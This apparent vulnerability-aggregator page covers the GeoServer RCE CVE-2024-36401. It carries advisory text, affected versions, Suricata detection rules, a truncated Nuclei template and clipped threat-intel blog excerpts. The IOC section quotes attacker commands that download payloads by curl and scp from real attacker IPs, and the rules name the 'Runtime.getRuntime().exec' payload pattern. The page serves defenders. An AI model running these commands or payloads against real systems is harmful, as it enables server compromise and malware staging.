CVE-2024-36401
published 2024-07-01CVE-2024-36401: GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC…
PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2024-08-05
Exploited in the wild
EPSS
99.81%
100.0th percentile
GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code.
Versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| geoserver | geoserver | < 2.22.6 | 2.22.6 |
| geoserver | geoserver | — | — |
| geoserver | geoserver | — | — |
| geoserver | geoserver | — | — |
| geoserver | geoserver | >= 2.23.0 < 2.23.6 | 2.23.6 |
| geoserver | geoserver | >= 2.24.0 < 2.24.4 | 2.24.4 |
| geoserver | geoserver | >= 2.25.0 < 2.25.2 | 2.25.2 |
| geotools | geotools | < 29.6 | 29.6 |
| geotools | geotools | — | — |
| geotools | geotools | — | — |
| geotools | geotools | >= 30.1 < 30.4 | 30.4 |
| geotools | geotools | >= 31.1 < 31.2 | 31.2 |
Detection & IOCsextracted from sources · hover to see the quote
commandcurl --connect-timeout 3 -m 10 -o c:\windows\temp\{file name} http://167[.]172[.]89[.]142/{file name}↗
commandcmd /c "scp -P 23 -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o UserKnownHostsFile=C:\windows\temp\ t1sc@152[.]42[.]243[.]170:/tmp/bd/{file name} c:\windows\temp\"↗
- →Hunt for outbound SCP connections on port 23 (non-standard) from GeoServer hosts, particularly to 152.42.243.170, as used for lateral payload staging. ↗
- →Exploitation is confirmed across WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic, and WPS Execute OGC request types — monitor all six for anomalous property name values containing XPath/expression syntax. ↗
- →Shadowserver observed CVE-2024-36401 attacks starting on July 9, 2024; use this date as a baseline for retrospective log hunting on GeoServer OGC request logs. ↗
- ·The vulnerability affects ALL GeoServer instances (not just those using complex/Application Schema feature types) because XPath evaluation is incorrectly applied to simple feature types as well. ↗
- ·Workaround of removing gt-complex-x.y.jar may break GeoServer functionality or prevent deployment if the gt-complex module is required; patching to 2.22.6, 2.23.6, 2.24.4, or 2.25.2 is preferred. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
OSGeo GeoServer GeoTools Eval Injection Vulnerability
cisa·2024-07-15·CVSS 9.8
CVE-2024-36401 [CRITICAL] CWE-95 OSGeo GeoServer GeoTools Eval Injection Vulnerability
Vulnerability: OSGeo GeoServer GeoTools Eval Injection Vulnerability
Affected: OSGeo GeoServer
OSGeo GeoServer GeoTools contains an improper neutralization of directives in dynamically evaluated code vulnerability due to unsafely evaluating property names as XPath expressions. This allows unauthenticated attackers to conduct remote code execution via specially crafted input.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: This vulnerability affects an open-source component, third-party library, or a protocol used by different products. For more information, please see: https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv, https://github.com/geotools/geotools/pull/4797 ; https://
GHSA
Remote Code Execution (RCE) vulnerability in geoserver
ghsa·2024-07-01
CVE-2024-36401 [CRITICAL] CWE-94 Remote Code Execution (RCE) vulnerability in geoserver
Remote Code Execution (RCE) vulnerability in geoserver
### Summary
Multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
### Details
The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances.
### PoC
No
OSV
Remote Code Execution (RCE) vulnerability in geoserver
osv·2024-07-01
CVE-2024-36401 [CRITICAL] Remote Code Execution (RCE) vulnerability in geoserver
Remote Code Execution (RCE) vulnerability in geoserver
### Summary
Multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
### Details
The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances.
### PoC
No
VulnCheck
OSGeo GeoServer GeoTools Eval Injection Vulnerability
vulncheck·2024·CVSS 9.8
CVE-2024-36401 [CRITICAL] CWE-95 OSGeo GeoServer GeoTools Eval Injection Vulnerability
OSGeo GeoServer GeoTools Eval Injection Vulnerability
OSGeo GeoServer GeoTools contains an improper neutralization of directives in dynamically evaluated code vulnerability due to unsafely evaluating property names as XPath expressions. This allows unauthenticated attackers to conduct remote code execution via specially crafted input.
Affected: OSGeo GeoServer
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2024-36401; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-07-28&host_type=src&vulnerability=cve-2024-3640
Suricata
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M2 (CVE-2024-36401)
suricata·2024-09-09·CVSS 9.8
CVE-2024-36401 [CRITICAL] ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M2 (CVE-2024-36401)
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M2 (CVE-2024-36401)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M2 (CVE-2024-36401)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:14; content:"/geoserver/wfs"; fast_pattern; http.request_body; content:"valuereference"; nocase; content:"exec|28|java.lang.Runtime.getRuntime|28 29 2c|"; nocase; within:50; reference:cve,2024-36401; reference:url,github.com/Mr-xn/CVE-2024-36401?tab=readme-ov-file; classtype:attempted-admin; sid:2055808; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state plaintext, created_at 2024_09_09, cve CVE_2024_36401, deployment Perimeter, deployment Internal, performance_impact Lo
Suricata
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M1 (CVE-2024-36401)
suricata·2024-09-09·CVSS 9.8
CVE-2024-36401 [CRITICAL] ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M1 (CVE-2024-36401)
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M1 (CVE-2024-36401)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M1 (CVE-2024-36401)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:14; content:"/geoserver/wfs"; fast_pattern; http.request_body; content:"propertyname"; nocase; content:"exec|28|java.lang.Runtime.getRuntime|28 29 2c|"; nocase; within:50; reference:cve,2024-36401; reference:url,github.com/Mr-xn/CVE-2024-36401?tab=readme-ov-file; classtype:attempted-admin; sid:2055805; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state plaintext, created_at 2024_09_09, cve CVE_2024_36401, deployment Perimeter, deployment Internal, performance_impact Low,
Suricata
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M5 (CVE-2024-36401)
suricata·2024-09-09·CVSS 9.8
CVE-2024-36401 [CRITICAL] ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M5 (CVE-2024-36401)
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M5 (CVE-2024-36401)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M5 (CVE-2024-36401)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/geoserver/w"; fast_pattern; startswith; content:"s?"; distance:1; within:2; content:"valuereference"; nocase; distance:0; content:"exec|28|java.lang.Runtime.getRuntime|28 29 2c|"; nocase; within:40; reference:cve,2024-36401; reference:url,github.com/Mr-xn/CVE-2024-36401?tab=readme-ov-file; classtype:attempted-admin; sid:2055811; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state plaintext, created_at 2024_09_09, cve CVE_2024_36401, deployment Perimeter, deployment Int
Suricata
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M4 (CVE-2024-36401)
suricata·2024-09-09·CVSS 9.8
CVE-2024-36401 [CRITICAL] ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M4 (CVE-2024-36401)
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M4 (CVE-2024-36401)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M4 (CVE-2024-36401)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/geoserver/w"; fast_pattern; startswith; content:"s?"; distance:1; within:2; content:"propertyname"; nocase; distance:0; content:"exec|28|java.lang.Runtime.getRuntime|28 29 2c|"; nocase; within:40; reference:cve,2024-36401; reference:url,github.com/Mr-xn/CVE-2024-36401?tab=readme-ov-file; classtype:attempted-admin; sid:2055810; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state plaintext, created_at 2024_09_09, cve CVE_2024_36401, deployment Perimeter, deployment Inter
Suricata
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M3 (CVE-2024-36401)
suricata·2024-09-09·CVSS 9.8
CVE-2024-36401 [CRITICAL] ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M3 (CVE-2024-36401)
ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M3 (CVE-2024-36401)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Geoserver Unsafe jxpath Evaluation RCE Attempt M3 (CVE-2024-36401)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:14; content:"/geoserver/wfs"; fast_pattern; http.request_body; content:"valuereference"; nocase; content:"eval|28|getEngineByName|28|javax.script.ScriptEngineManager.new|28 29 2c|"; nocase; within:70; reference:cve,2024-36401; reference:url,github.com/Mr-xn/CVE-2024-36401?tab=readme-ov-file; classtype:attempted-admin; sid:2055809; rev:1; metadata:affected_product Geoserver, attack_target Server, tls_state plaintext, created_at 2024_09_09, cve CVE_2024_36401, deployment Perimeter, deployment Inte
Nuclei
GeoServer and GeoTools - Remote Code Execution
nuclei·CVSS 9.8
CVE-2024-36404 [CRITICAL] GeoServer and GeoTools - Remote Code Execution
GeoServer and GeoTools - Remote Code Execution
GeoTools is an open source Java library that provides tools for geospatial data. Prior to versions 31.2, 30.4, and 29.6, Remote Code Execution (RCE) is possible if an application uses certain GeoTools functionality to evaluate XPath expressions supplied by user input. Versions 31.2, 30.4, and 29.6 contain a fix for this issue. As a workaround, GeoTools can operate with reduced functionality by removing the `gt-complex` jar from one's application. As an example of the impact, application schema `datastore` would not function without the ability to use XPath expressions to query complex content. Alternatively, one may utilize a drop-in replacement GeoTools jar from SourceForge for versions 31.1, 30.3, 30.2, 29.2, 28.2, 27.5, 27.4, 26.7, 26.4, 2
Nuclei
GeoServer RCE in Evaluating Property Name Expressions
nuclei·CVSS 9.8
CVE-2024-36401 [CRITICAL] GeoServer RCE in Evaluating Property Name Expressions
GeoServer RCE in Evaluating Property Name Expressions
In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
Template:
id: CVE-2024-36401
info:
name: GeoServer RCE in Evaluating Property Name Expressions
author: DhiyaneshDk,ryanborum
severity: critical
description: |
In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names a
Metasploit
Geoserver unauthenticated Remote Code Execution
metasploit
Geoserver unauthenticated Remote Code Execution
Geoserver unauthenticated Remote Code Execution
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets. In the GeoServer versions = 2.24.0, = 2.25.0, < 2.25.1, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. An attacker can abuse this by sending a POST request with a malicious xpath expression to execute arbitrary commands as root on the sy
Hackernews
New SharkLoader Malware Deploys Cobalt Strike in StrikeShark Cyberattacks
blogs_hackernews·2026-06-26·CVSS 9.8
CVE-2021-26855 [CRITICAL] New SharkLoader Malware Deploys Cobalt Strike in StrikeShark Cyberattacks
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## New SharkLoader Malware Deploys Cobalt Strike in StrikeShark Cyberattacks
A newly discovered cyber attack campaign has been observed delivering a previously undocumented malware family called SharkLoader that acts as a loader for deploying Cobalt Strike Beacon on compromised hosts.
Kaspersky, which is tracking the activity under the moniker StrikeShark , said the campaign has targeted a diplomatic organization in Indonesia, government organizations in Taiwan, software development companies across multiple countries, and entities associated with other sectors located in Hong Kong, Lebanon, Syria, Colombia, North Macedonia, Ne
Securelist
StrikeShark: investigating a new campaign delivering Cobalt Strike through SharkLoader
blogs_securelist·2026-06-24
CVE-2021-26855 StrikeShark: investigating a new campaign delivering Cobalt Strike through SharkLoader
Fareed Radzi
Table of Contents
Introduction
Initial infection
Exploitation of public-facing applications
Dropper-based distribution
SharkLoader installation
SharkLoader DLL – Main implant
“PerfectDLL Hijacking” technique
Decryption and loading of >DscCoreR.mui
DscCoreR.mui and SyncRes.dat DLLs
Decryption and loading of SyncRes.dat
SyncRes.dat decrypted DLL: Multiple API hooks
VEH registration and access violation handling
Thread creation for Cobalt Strike Beacon execution
MinHook DLL, API hooking, and Cobalt Strike beacon
Persistence mechanism
Post-compromise activity
Victimology
Attribution
Conclusion
Indicators of compromise
Authors
Fareed Radzi
## Introduction
During our research of activity affecting a diplomatic organization in Indonesia, we uncovered a previo
Wiz
Crying Out Cloud Monthly Newsletter - January 2026 | Wiz
blogs_wiz·2026-01-22·CVSS 8.7
CVE-2025-55182 [HIGH] Crying Out Cloud Monthly Newsletter - January 2026 | Wiz
Welcome back! In this edition, we bring you the latest in cloud security: noteworthy incidents, exclusive data, and crucial vulnerabilities. Let’s jump in.
## 🔍 Highlights
React2Shell: Critical RCE Vulnerability in React and Next.js
React2Shell (CVE-2025-55182) is a critical, unauthenticated remote code execution vulnerability rooted in insecure deserialization within the React Server Components (RSC) “Flight” protocol, impacting React 19 and RSC-enabled frameworks, most notably Next.js. The flaw affects default configurations, meaning standard production deployments can be exploited with a single crafted HTTP request and no developer misconfiguration, with exploitation demonstrating near-100% reliability.
Since early December 2025, exploitation has been observed in the wild by multipl
Bleepingcomputer
CISA orders feds to patch actively exploited Geoserver flaw
blogs_bleepingcomputer·2025-12-12·CVSS 8.2
[HIGH] CISA orders feds to patch actively exploited Geoserver flaw
## CISA orders feds to patch actively exploited Geoserver flaw
## Sergiu Gatlan
CISA has ordered U.S. federal agencies to patch a critical GeoServer vulnerability now actively exploited in XML External Entity (XXE) injection attacks.
In such attacks, an XML input containing a reference to an external entity is processed by a weakly configured XML parser, allowing threat actors to launch denial-of-service attacks, access confidential data, or perform Server-Side Request Forgery (SSRF) to interact with internal systems.
The security flaw (tracked as CVE-2025-58360 ) flagged by CISA on Thursday is an unauthenticated XML External Entity (XXE) vulnerability in GeoServer 2.26.1 and prior versions (an open-source server for sharing geospatial data over the Internet) that can be exploited to r
Tenable
Cybersecurity Snapshot: CISA Highlights Vulnerability Management Importance in Breach Analysis, as Orgs Are Urged To Patch Cisco Zero-Days
blogs_tenable·2025-09-26
Cybersecurity Snapshot: CISA Highlights Vulnerability Management Importance in Breach Analysis, as Orgs Are Urged To Patch Cisco Zero-Days
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Bleepingcomputer
CISA says hackers breached federal agency using GeoServer exploit
blogs_bleepingcomputer·2025-09-23·CVSS 9.8
CVE-2024-36401 [CRITICAL] CISA says hackers breached federal agency using GeoServer exploit
## CISA says hackers breached federal agency using GeoServer exploit
## Sergiu Gatlan
CISA has revealed that attackers breached the network of an unnamed U.S. federal civilian executive branch (FCEB) agency last year after compromising an unpatched GeoServer instance.
The security bug (tracked as CVE-2024-36401 ) is a critical remote code execution (RCE) vulnerability patched on June 18, 2024. CISA added the flaw to its catalog of actively exploited vulnerabilities roughly one month later , after multiple security researchers shared proof-of-concept exploits online [ 1 , 2 , 3 ], demonstrating how to gain code execution on exposed servers.
While the cybersecurity agency did not provide any details on how the flaws were being exploited in the wild, threat monitoring service Shadowserver
Unit42
Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth
blogs_unit42·2025-08-21·CVSS 9.8
CVE-2024-36401 [CRITICAL] Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth
## Executive Summary
We have detected a campaign aimed at gaining access to victims’ machines and monetizing access to their bandwidth. It functions by exploiting the CVE-2024-36401 vulnerability in the GeoServer geospatial database. This Critical-severity remote code execution vulnerability has a CVSS score of 9.8. Criminals have used the vulnerability to deploy legitimate software development kits (SDKs) or modified apps to gain passive income via network sharing or residential proxies.
This method of generating passive income is particularly stealthy. It mimics a monetization strategy used by some legitimate app developers who choose SDKs instead of displaying traditional ads. This can be a well-intentioned choice that protects the user experience and improves app retention.
The appl
Unit42
Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth
blogs_unit42·2025-08-21·CVSS 9.8
CVE-2024-36401 [CRITICAL] Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth
Threat Research Center
Threat Research
Vulnerabilities
## Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth
Zhibin Zhang
Yiheng An
Chao Lei
Haozhe Zhang
Published: August 21, 2025
Threat Research
Vulnerabilities
CVE-2024-36401
## Executive Summary
We have detected a campaign aimed at gaining access to victims’ machines and monetizing access to their bandwidth. It functions by exploiting the CVE-2024-36401 vulnerability in the GeoServer geospatial database. This Critical-severity remote code execution vulnerability has a CVSS score of 9.8. Criminals have used the vulnerability to deploy legitimate software development kits (SDKs) or modified apps to gain passive income via network sharing or residential proxies.
This method of generating passive
Trendmicro
Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
blogs_trendmicro·2024-09-19·CVSS 9.8
[CRITICAL] Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
APT und gezielte Angriffe
## Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
We observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques like spear-phishing and customized malware, with data suggesting that the group operates from China.
By: Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, Philip Chen Sep 19, 2024 Read time: ( words)
Save to Folio
## Summary
Threat actor Earth Baxia has targeted a government organization in Taiwan – and potentially other countries in the Asia-Pacific (APAC) region – using spear-phishing emails and the GeoServer vulnerability CVE-2024-36401.
CVE-2024-36401 is a remote code execution exploit that allowed the threat actors to download or copy malicious components.
The threat actor empl
Trendmicro
Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
blogs_trendmicro·2024-09-19·CVSS 9.8
[CRITICAL] Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
APT & Targeted Attacks
## Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
We observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques like spear-phishing and customized malware, with data suggesting that the group operates from China.
By: Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, Philip Chen 2024/09/19 Read time: ( words)
Save to Folio
## Summary
Threat actor Earth Baxia has targeted a government organization in Taiwan – and potentially other countries in the Asia-Pacific (APAC) region – using spear-phishing emails and the GeoServer vulnerability CVE-2024-36401.
CVE-2024-36401 is a remote code execution exploit that allowed the threat actors to download or copy malicious components.
The threat actor employs G
Trendmicro
Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
blogs_trendmicro·2024-09-19·CVSS 9.8
[CRITICAL] Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
APT y ataques dirigidos
## Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
We observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques like spear-phishing and customized malware, with data suggesting that the group operates from China.
By: Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, Philip Chen Sep 19, 2024 Read time: ( words)
Save to Folio
## Summary
Threat actor Earth Baxia has targeted a government organization in Taiwan – and potentially other countries in the Asia-Pacific (APAC) region – using spear-phishing emails and the GeoServer vulnerability CVE-2024-36401.
CVE-2024-36401 is a remote code execution exploit that allowed the threat actors to download or copy malicious components.
The threat actor employ
Trendmicro
Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
blogs_trendmicro·2024-09-19·CVSS 9.8
[CRITICAL] Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
APT & Targeted Attacks
# Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
We observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques like spear-phishing and customized malware, with data suggesting that the group operates from China.
By: Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, Philip Chen
2024/09/19
Read time: ( words)
Save to Folio
#### Summary
- Threat actor Earth Baxia has targeted a government organization in Taiwan – and potentially other countries in the Asia-Pacific (APAC) region – using spear-phishing emails and the GeoServer vulnerability CVE-2024-36401.
- CVE-2024-36401 is a remote code execution exploit that allowed the threat actors to download or copy malicious components.
- The threat actor emp
Trendmicro
Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
blogs_trendmicro·2024-09-19·CVSS 9.8
[CRITICAL] Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
APT & Targeted Attacks
## Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC
We observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques like spear-phishing and customized malware, with data suggesting that the group operates from China.
By: Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, Philip Chen Sep 19, 2024 Read time: ( words)
Save to Folio
## Summary
Threat actor Earth Baxia has targeted a government organization in Taiwan – and potentially other countries in the Asia-Pacific (APAC) region – using spear-phishing emails and the GeoServer vulnerability CVE-2024-36401.
CVE-2024-36401 is a remote code execution exploit that allowed the threat actors to download or copy malicious components.
The threat actor employs
Fortinet
Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 | FortiGuard Labs
blogs_fortinet·2024-09-05·CVSS 9.8
CVE-2024-36401 [CRITICAL] Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401
Overview
GOREVERSE
SideWalk
Mirai Variant - JenX
Condi
CoinMiner
[1]
[2]
[3]
[4]
Conclusion
Fortinet Protection
IoC
URL
IP Address/Hostname
Wallet
SHA256Hash
By Cara Lin and Vincent Li | September 05, 2024
Affected Platforms: GeoServer prior to versions 2.23.6, 2.24.4, and 2.25.2
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
GeoServer is an open-source software server written in Java that allows users to share and edit geospatial data. It is the reference implementation of the Open Geospatial Consortium (OGC) Web Feature Service (WFS) and Web Coverage Service (WCS) standards. On July 1, the project maintainers released
Bleepingcomputer
CISA warns critical Geoserver GeoTools RCE flaw is exploited in attacks
blogs_bleepingcomputer·2024-07-16·CVSS 9.8
CVE-2024-36401 [CRITICAL] CISA warns critical Geoserver GeoTools RCE flaw is exploited in attacks
## CISA warns critical Geoserver GeoTools RCE flaw is exploited in attacks
## Lawrence Abrams
CISA is warning that a critical GeoServer GeoTools remote code execution flaw tracked as CVE-2024-36401 is being actively exploited in attacks.
GeoServer is an open-source server that allows users to share, process, and modify geospatial data.
On June 30th, GeoServer disclosed a critical 9.8 severity remote code execution vulnerability in its GeoTools plugin caused by unsafely evaluating property names as XPath expressions.
"The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions," reads the GeoServer advisory .
"This
Checkpoint
8th July – Threat Intelligence Report
blogs_checkpoint·2024-07-08
CVE-2024-6387 8th July – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 8th July – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 8th July, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
FIA, the governing body for Formula 1, disclosed a data breach stemming from a phishing attack on their email accounts. The attack led to unauthorized access to personal data, and the incident has been reported to relevant data protection regulators. FIA is taking steps to bolster security and has initiated protective measures fo
Greynoiseio
NoiseLetter July 2024
blogs_greynoiseio
NoiseLetter July 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Threat Intel
Earth Baxia
threat_intel·CVSS 9.8
CVE-2024-36401 [CRITICAL] Earth Baxia
# Threat Actor: Earth Baxia
## Description
Earth Baxia is a threat actor opearting out of China, targeting government organizations in Taiwan and potentially across the APAC region, using spear-phishing emails and exploiting the GeoServer vulnerability CVE-2024-36401 for remote code execution, deploying customized Cobalt Strike components with altered signatures, leveraging GrimResource and AppDomainManager injection techniques to deliver additional payloads, and utilizing a new backdoor named EAGLEDOOR for multi-protocol communication and payload delivery.
## Associated Malware Families (1)
win.cobalt_strike
arXiv
Cybersecurity AI Benchmark (CAIBench): A Meta-Benchmark for Evaluating Cybersecurity AI Agents
arxiv_fulltext·2025-10-28
Cybersecurity AI Benchmark (CAIBench): A Meta-Benchmark for Evaluating Cybersecurity AI Agents
-1em
## Abstract
